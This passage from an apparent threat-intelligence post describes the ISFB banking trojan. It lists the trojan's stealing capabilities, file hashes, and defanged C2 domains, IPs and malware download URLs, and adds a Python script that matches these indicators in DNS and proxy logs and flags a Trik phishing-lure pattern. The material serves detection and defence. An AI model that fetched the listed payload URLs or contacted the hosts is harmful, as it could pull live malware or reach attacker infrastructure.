However, many groups deploy the trojan because of its evasive capabilities for avoiding detection and analysis.</p> <p>Main ISFB stealer capabilities:</p> <ul><li>Keylogging</li> <li>Capturing screenshots and video of activity on the system</li> <li>Extracting browser cookies, preserving their directory structure</li> <li>Retrieving certificates stored in the Windows certificate store</li> <li>Harvesting email credentials</li> <li>Hooking browser APIs to serve substitute (phishing) pages in place of legitimate banking sites</li> <li>Capturing FTP credentials</li> </ul><h3><strong>Indicators of Compromise (IOC):</strong></h3> <p><strong>Main object - "PIC074780520-JPG.js:"</strong><br /><code>sha256 5ef40d547de68ffbb7c265ae074b24ae34bffaaa4420d25fe7d9c70f81c952e8 <br /> sha1 c4f7f94fe74dfe1ec1b9807806bc4cc87d1d487d <br /> md5 2d0df477069cba3cf75ec987a0e9270f</code></p> <p><strong>Dropped Executable Files:</strong><br /><code><em>C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\619514.exe</em><br /> sha256 90d3580e187b631a9150bbb4a640b84c6fa990437febdc42f687cc7b3ce1deac <br /><em>C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\1[1].exe</em><br /> sha256 22709d7884e71cdeb419e81453644edef69f8373a7a676c85c4d85f1ab67be46 <br /><em>C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\2[1].exe</em><br /> sha256 1a26ce3b96b1ccd7af4c8d6f4de0e4b4320535b20895a295e1a96aa009843a71 <br /><em>C:\Users\admin\AppData\Local\Temp\2482930933.exe</em><br /> sha256 60924e938260500bea6ca3a3475455bdea8ec70ad6df3358f2f867460061c535</code></p> <p><strong>DNS requests:</strong><br /><code>domain efhoahegue[.]ru <br /> domain afhoahegue[.]ru <br /> domain tfhoahegue[.]ru <br /> domain rfhoahegue[.]ru <br /> domain xfhoahegue[.]ru <br /> domain afhoahegue[.]su <br /> domain efhoahegue[.]su <br /> domain rfhoahegue[.]su <br /> domain tfhoahegue[.]su <br /> domain xfhoahegue[.]su <br /> domain 
resolver1.opendns[.]com <br /> domain 11totalzaelooop11[.]club <br /> domain www.kakaocorp[.]link <br /> domain myip.opendns[.]com <br /> domain adonis-medicine[.]at</code></p> <p>Note that resolver1.opendns[.]com, myip.opendns[.]com and 208.67.222.222 below are OpenDNS infrastructure: resolving myip.opendns.com through the OpenDNS resolver returns the querier's own public IP address, so these entries are the sample discovering its external address, not attacker-controlled hosts. Treat them as context and keep them off blocklists.</p> <p><strong>Connections:</strong><br /><code>ip 92.63.197.153 <br /> ip 208.67.222.222 <br /> ip 188.254.179.205 <br /> ip 107.173.49.208 <br /> ip 192.35.177.64</code></p> <p><strong>HTTP/HTTPS Requests:</strong><br /><code>url http://adonis-medicine[.]at/images/QCnhd13eICD_2/FPJ2piPS/PS_2Bxev9vpAGP4MTx_2F5v/1dd3qTe_2F/hU3xzApMxcvBsHkWM/SXNfDncA7LDF/cVEdPbPh7A_/2BX1p7Me4FE5_2/BWTVpI8Ll3n3urrWJ2ccF/j207fj_2B1A7SCAa/mGyGbrlGM_2FGYg/BXvsEnZXARx0xFm_2F/r5ulwkYbj/sO_2FgZRsy6rhMRprx_2/BMLflLF.gif <br /> url http://92.63.197[.]153/s/4.exe <br /> url http://92.63.197[.]153/s/3.exe <br /> url http://adonis-medicine[.]at/images/Xpzysfts0_2Fc_2FVlnv/NVGgAHDEh1TFvW_2Byg/MmdXsFq9DvBELXouRNsWNb/6jOOxvSLBXkgr/br9sw7Ua/tnGUy90pkA4OkqPP8Eg5kHe/H32t42meYu/pqbX6lOVuidptuaA9/VqdUlN0_2BRK/3fteGZrDG0t/Bs8MrcyOvwh0Fb/wyJqwrzppTtLvuRjEuFmu/ziUfZmNLeqU7M_2B/wQKEgXFVauQB_2B/HSqc3.bmp <br /> url http://92.63.197[.]153/s/VNEW=1 <br /> url http://92.63.197[.]153/good.exe <br /> url http://92.63.197[.]153/s/1.exe <br /> url http://92.63.197[.]153/s/2.exe <br /> url http://92.63.197[.]153/s/5.exe <br /> url http://www.kakaocorp[.]link/ <br /> url http://92.63.197[.]153/update.txt</code></p> Tue, 09 Apr 2019 17:54:55 +0000
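<p>The IOC list above is defanged for safe publication, so it must be refanged before it can be matched, and not every entry belongs on a blocklist. The script below is an added example, not code from the original post: it loads a subset of the indicators above, drops the OpenDNS entries as context rather than attacker infrastructure, matches DNS and proxy records (constructed here, in an assumed "timestamp source value" format), and also renders the Trik sender and attachment naming pattern described in the Trik Botnet Phishing Emails section as regexes of my own making.</p>

```python
"""Load the defanged IOCs from the post into a matcher, run it over DNS and
proxy logs, and flag the Trik lure pattern (sender and attachment names).

Added example, not code from the original post. The IOC values are a subset
of the list in the post; the log lines, message headers and their formats are
constructed. The two regexes are one rendering of the naming pattern the
post describes, not a signature taken from the malware.
"""
import re
from urllib.parse import urlsplit

# OpenDNS infrastructure appears in the DNS list because the sample looks up
# its own public address; it is context, not something to block.
CONTEXT_ONLY = {"resolver1.opendns.com", "myip.opendns.com", "208.67.222.222"}

IOC_TEXT = """
domain efhoahegue[.]ru
domain afhoahegue[.]ru
domain tfhoahegue[.]ru
domain efhoahegue[.]su
domain 11totalzaelooop11[.]club
domain www.kakaocorp[.]link
domain adonis-medicine[.]at
domain resolver1.opendns[.]com
domain myip.opendns[.]com
ip 92.63.197.153
ip 208.67.222.222
ip 188.254.179.205
ip 107.173.49.208
ip 192.35.177.64
url http://92.63.197[.]153/s/1.exe
url http://92.63.197[.]153/s/2.exe
url http://92.63.197[.]153/update.txt
"""


def refang(value):
    """Undo the defanging used in the post ([.] for dots, hxxp for http)."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def load_iocs(text):
    """Parse 'type value' lines into sets keyed by type, dropping context-only entries."""
    iocs = {"domain": set(), "ip": set(), "url": set()}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or parts[0] not in iocs:
            continue
        value = refang(parts[1]).lower()
        host = urlsplit(value).hostname if parts[0] == "url" else value
        if host not in CONTEXT_ONLY:
            iocs[parts[0]].add(value)
    return iocs


def match_dns(lines, iocs):
    """'timestamp src qname' records -> (timestamp, src, qname) for listed domains."""
    hits = []
    for line in lines:
        ts, src, qname = line.split()
        qname = qname.lower().rstrip(".")
        if qname in iocs["domain"]:
            hits.append((ts, src, qname))
    return hits


def match_http(lines, iocs):
    """'timestamp src url' records -> (timestamp, src, kind, value). An exact URL
    match is reported as 'url'; any other request to a listed host or IP as 'host'."""
    hits = []
    for line in lines:
        ts, src, url = line.split()
        url = url.lower()
        host = urlsplit(url).hostname or ""
        if url in iocs["url"]:
            hits.append((ts, src, "url", url))
        elif host in iocs["ip"] or host in iocs["domain"]:
            hits.append((ts, src, "host", host))
    return hits


# Sender: bogus name + two digits @ four digits .com; attachment: PIC<digits>-JPG.zip.
#These are my rendering of the pattern the post describes, not the malware's lists.
TRIK_SENDER_RE = re.compile(r"^[a-z]+\d{2}@\d{4}\.com$", re.IGNORECASE)
TRIK_ATTACHMENT_RE = re.compile(r"^PIC\d+-JPG\.zip$", re.IGNORECASE)


def is_trik_lure(sender, attachment):
    """True when both the sender address and the attachment name fit the Trik pattern."""
    return bool(TRIK_SENDER_RE.match(sender) and TRIK_ATTACHMENT_RE.match(attachment))


# Constructed log records: one hit, one context-only lookup, one clean query/request each.
SAMPLE_DNS = [
    "2019-04-08T09:00:01Z 10.0.0.41 efhoahegue.ru",
    "2019-04-08T09:00:02Z 10.0.0.41 resolver1.opendns.com",
    "2019-04-08T09:00:03Z 10.0.0.41 www.example.com",
]
SAMPLE_HTTP = [
    "2019-04-08T09:00:04Z 10.0.0.41 http://92.63.197.153/s/1.exe",
    "2019-04-08T09:00:05Z 10.0.0.41 http://92.63.197.153/s/VNEW=1",
    "2019-04-08T09:00:06Z 10.0.0.41 http://www.example.com/",
]

if __name__ == "__main__":
    iocs = load_iocs(IOC_TEXT)
    for hit in match_dns(SAMPLE_DNS, iocs) + match_http(SAMPLE_HTTP, iocs):
        print(hit)
    print(is_trik_lure("jessica47@3821.com", "PIC074780520-JPG.zip"))
```

<p>Exact-URL hits are reported separately from host hits so that a request to a new path on 92.63.197.153 still surfaces, and the Trik lure check requires both the sender pattern and the attachment name to match, which keeps false positives down while still catching every message in a campaign that reuses the hardcoded lists.</p>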